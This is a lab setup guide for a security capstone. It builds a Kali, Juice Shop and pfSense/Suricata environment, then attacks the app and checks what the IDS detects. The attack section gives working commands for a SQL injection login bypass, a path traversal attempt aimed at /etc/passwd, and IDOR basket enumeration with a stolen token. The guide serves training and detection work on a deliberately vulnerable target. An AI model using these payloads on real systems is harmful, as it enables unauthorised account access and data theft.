Lab Replication Guide
Overview
This guide walks you through replicating the complete Attack-Defend Lifecycle capstone in your own lab environment.
System Requirements
Host Machine
- OS: macOS, Linux, or Windows with Hyper-V
- Virtualization: VMware, VirtualBox, UTM, or Hyper-V
- Minimum RAM: 16 GB (8 GB minimum for basic setup)
- Disk Space: 80 GB free (3 VMs × ~20-30 GB each)
Virtual Machines Required
- Kali Linux 2023 (ARM64 or x86_64)
- CPU: 2 cores
- RAM: 4 GB
- Disk: 20 GB
- Role: Attacker workstation
- Ubuntu 22.04 LTS (x86_64)
- CPU: 2 cores
- RAM: 4 GB
- Disk: 20 GB
- Role: Target server (runs OWASP Juice Shop via Docker)
- pfSense 2.8.1 (x86_64)
- CPU: 2 cores
- RAM: 2 GB
- Disk: 10 GB
- Role: Firewall + IDS (runs Suricata)
Network Configuration
Three-Zone Architecture
┌─────────────────────────────────────┐
│ WAN ZONE │
│ (Upstream Internet - Disconnected) │
└──────────────┬──────────────────────┘
│
┌──────▼──────┐
│ pfSense │
│ (Firewall) │
│ (Suricata) │
└──────┬──────┘
│
┌──────▼──────────────────┐
│ LAN ZONE (192.168.1.0/24) │
│ │
├─ Kali (192.168.1.105) │
├─ Ubuntu (192.168.1.110) │
└─────────────────────────┘
IP Addressing
| Device | IP Address | VLAN | Role |
|---|---|---|---|
| pfSense LAN | 192.168.1.1 | 1 | Gateway/Firewall |
| Kali | 192.168.1.105 | 1 | Attacker |
| Ubuntu | 192.168.1.110 | 1 | Target |
Network Adapter Configuration
All three VMs must be on Bridged networking (or equivalent for your hypervisor):
- Allows VM-to-VM communication
- Enables firewall traffic inspection
- Creates a single LAN segment
Installation Steps
Step 1: Deploy Kali Linux
- Download Kali Linux 2023 ISO from kali.org
- Create new VM with specs above
- Install with default settings
- Set hostname:
kali - Configure network for Bridged mode
Post-Install:
sudo apt update && sudo apt upgrade -y
sudo apt install curl jq vim git -y
Step 2: Deploy Ubuntu 22.04
- Download Ubuntu 22.04 LTS ISO from ubuntu.com
- Create new VM with specs above
- Install with default settings (enable OpenSSH)
- Set hostname:
ubuntu - Configure network for Bridged mode
Post-Install - Set Static IP:
sudo nano /etc/netplan/00-installer-config.yaml
Replace with:
network:
version: 2
ethernets:
eth0:
dhcp4: no
addresses: [192.168.1.110/24]
gateway4: 192.168.1.1
nameservers:
addresses: [8.8.8.8, 8.8.4.4]
Apply:
sudo netplan apply
Install Docker & Juice Shop:
sudo apt install docker.io -y
sudo docker run -d -p 3000:3000 bkimminich/juice-shop
Verify:
curl http://localhost:3000
Step 3: Deploy pfSense
- Download pfSense 2.8.1 from pfsense.org
- Create new VM with specs above
- During installation:
- LAN interface:
em0(or first adapter) - Configure LAN IP:
192.168.1.1/24 - DHCP server: Enable
- WAN interface: Configure secondary (can be DHCP from host)
- LAN interface:
- Access web UI:
https://192.168.1.1- Default username:
admin - Default password:
pfsense
- Default username:
Change Password:
- Login to web UI
- System → User Manager → admin → Change Password
- Set strong password
Step 4: Install Suricata on pfSense
- In pfSense web UI: System → Packages
- Search for “suricata”
- Click Install
- Wait for installation (5-10 minutes)
Configure Suricata:
- Services → Suricata → Interfaces
- Click ”+” to add interface
- Select LAN (em0)
- Enable: “Enable Suricata”
- Click Save
Wait for interface to start (may take 1-2 minutes)
Step 5: Load Detection Rules
- Go to Services → Suricata → LAN → LAN Rules
- Paste the five rules from
rules/local.rulesinto the text area - Click Save
- Suricata will reload
Verify Rules Loaded:
- Go to Services → Suricata → LAN
- Status should show “Running”
- Rules count should reflect your custom rules
Network Connectivity Validation
From Kali terminal, verify the lab:
# Check your IP
ip a | grep "inet 192"
# Should show: inet 192.168.1.105/24
# Test gateway
ping -c 3 192.168.1.1
# Should get responses
# Test Ubuntu
ping -c 3 192.168.1.110
# Should get responses
# Test Juice Shop
curl http://192.168.1.110:3000
# Should return HTML
If all three work ✓, your lab is ready.
Executing the Attacks
Attack 1: SQL Injection
From Kali:
# Create payload
cat > sqli_payload.json << 'EOF'
{"email": "' OR 1=1--", "password": "anything"}
EOF
# Execute attack
curl -X POST http://192.168.1.110:3000/rest/user/login \
-H "Content-Type: application/json" \
--data-binary @sqli_payload.json | jq
Expected Response:
{"authentication":{"token":"eyJ0eXAi..."}}
Attack 2: Path Traversal
From Kali:
# Baseline (legitimate request)
curl http://192.168.1.110:3000/ftp/legal.md
# Obfuscation bypass
curl "http://192.168.1.110:3000/ftp/....//....//....//....//etc/passwd"
Expected: Second request returns “Only .md and .pdf files are allowed!” (filter was bypassed, whitelist held)
Attack 3: IDOR
From Kali:
# Get token
TOKEN=$(curl -s -X POST http://192.168.1.110:3000/rest/user/login \
-H "Content-Type: application/json" \
--data-binary @sqli_payload.json | jq -r '.authentication.token')
# Enumerate baskets
curl -H "Authorization: Bearer $TOKEN" \
http://192.168.1.110:3000/rest/basket/1 | jq '.data | {id, UserId}'
curl -H "Authorization: Bearer $TOKEN" \
http://192.168.1.110:3000/rest/basket/2 | jq '.data | {id, UserId}'
curl -H "Authorization: Bearer $TOKEN" \
http://192.168.1.110:3000/rest/basket/3 | jq '.data | {id, UserId}'
Expected: Different UserId values for each basket (broken access control)
Capturing Evidence
With Wireshark
- On Kali, install Wireshark:
sudo apt install wireshark -y - Start packet capture on LAN interface
- Run attacks (see above)
- Export HTTP streams:
- Right-click packet → Follow → HTTP Stream
- File → Export as PDF or screenshot
- Save evidence for documentation
With tcpdump
Alternative to Wireshark:
# From Kali, capture traffic
sudo tcpdump -i eth0 -w capstone.pcap host 192.168.1.110
# Run attacks in separate terminal
# Ctrl+C to stop capture
# View in Wireshark
wireshark capstone.pcap
Validating Detection
Check Suricata Alerts
- In pfSense web UI: Services → Suricata → LAN → Alerts
- Click Refresh
- Look for alerts with SID 1000001–1000005
Note: If alerts don’t appear due to platform constraints, use Wireshark evidence as backup (documented in DETECTION.md)
Correlate Traffic & Alerts
- Capture pcap (tcpdump or Wireshark)
- Note packet timestamps
- Check Suricata alert timestamps
- Match: attack packet time ≈ alert timestamp
- Verify: alert message contains expected content (e.g., “OR 1=1”)
Troubleshooting
“No route to host”
- Verify all VMs are on Bridged networking
- Check pfSense LAN interface is UP
- Restart networking:
sudo systemctl restart networking(on Kali/Ubuntu)
Juice Shop not responding
- SSH to Ubuntu:
ssh ubuntu@192.168.1.110 - Check Docker:
docker ps - If not running:
docker run -d -p 3000:3000 bkimminich/juice-shop - Wait 15 seconds, try curl again
Suricata rules won’t load
- Check syntax: Each rule must end with
; - Verify SID is unique (1000001-1000005 in this project)
- Check pfSense logs: System → Logs → System
Ubuntu IP keeps changing
- Configure static IP (see Step 2 above)
- Apply:
sudo netplan apply - Verify:
ip a | grep 192.168.1.110
Lab Teardown
When finished:
- Stop VMs (don’t delete)
- Shutdown Suricata: Services → Suricata → Stop
- Export evidence: Screenshots, pcaps, logs
- Archive VM snapshots: For future reference
To restart lab:
- Boot all three VMs in order: pfSense → Ubuntu → Kali
- Verify connectivity:
ping 192.168.1.1; ping 192.168.1.110 - Re-run attacks or load pcaps
Next Steps
Once lab is running:
- Follow ATTACKS.md for detailed attack walkthroughs
- Review DETECTION.md to understand rule engineering
- Study rules/local.rules for inline comments
- Examine Wireshark captures for packet-level understanding
Additional Resources
- Kali Linux Documentation
- Ubuntu Server Guide
- pfSense Documentation
- Suricata Rule Writing Guide
- OWASP Juice Shop
Last Updated: August 2, 2026
Tested On: macOS (Apple Silicon M1), UTM 4.x
Time to Complete: 2-4 hours (depending on VM provisioning speed)